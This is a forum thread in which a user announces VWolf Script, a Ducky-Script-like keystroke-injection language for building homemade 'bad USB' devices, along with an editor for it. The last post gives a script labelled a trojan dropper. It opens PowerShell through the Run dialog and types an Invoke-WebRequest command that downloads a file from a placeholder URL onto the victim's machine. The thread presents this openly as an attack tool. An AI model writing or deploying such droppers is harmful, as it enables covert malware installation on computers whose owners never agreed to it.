VWolf scripting language

A simple scripting language like Hak5's ducky script. The main purpose of this scripting language is to make homemade bad usbs by using a autorun.inf file. Github: https://github.com/Y7Group/VWolf-Script
9 Replies
Yazz
Yazz11mo ago
Making a script repo tomorrow.
Yazz
Yazz11mo ago
I made a script editor
No description
Yazz
Yazz11mo ago
for VWolf Script
Yazz
Yazz11mo ago
No description
Yazz
Yazz11mo ago
an example script
// initializes the script
INIT

// Delay for 500 ms
DELAY 500

// Opens the windows run dialog
RUN-DIALOG

// Delay for 500 ms
DELAY 500

// Types "cmd" and presses enter
STRING cmd {ENTER}

// Delay for 500 ms
DELAY 500

// Types "echo Hello, World!" and presses enter
STRING echo Hello, World! {ENTER}
// initializes the script
INIT

// Delay for 500 ms
DELAY 500

// Opens the windows run dialog
RUN-DIALOG

// Delay for 500 ms
DELAY 500

// Types "cmd" and presses enter
STRING cmd {ENTER}

// Delay for 500 ms
DELAY 500

// Types "echo Hello, World!" and presses enter
STRING echo Hello, World! {ENTER}
Yazz
Yazz11mo ago
No description
Yazz
Yazz11mo ago
working on syntax highlighting
Yazz
Yazz11mo ago
The Script Editor Is Here
Yazz
Yazz11mo ago
this is how simple it is to make a trojan dropper in VWolf Script
// VWolf Trojan Dropper
INIT
RUN-DIALOG
DELAY 500
STRING powershell {ENTER}
DELAY 5000
STRING Invoke-WebRequest <URL> -OutFile <OUT FILE NAME> {ENTER}
// VWolf Trojan Dropper
INIT
RUN-DIALOG
DELAY 500
STRING powershell {ENTER}
DELAY 5000
STRING Invoke-WebRequest <URL> -OutFile <OUT FILE NAME> {ENTER}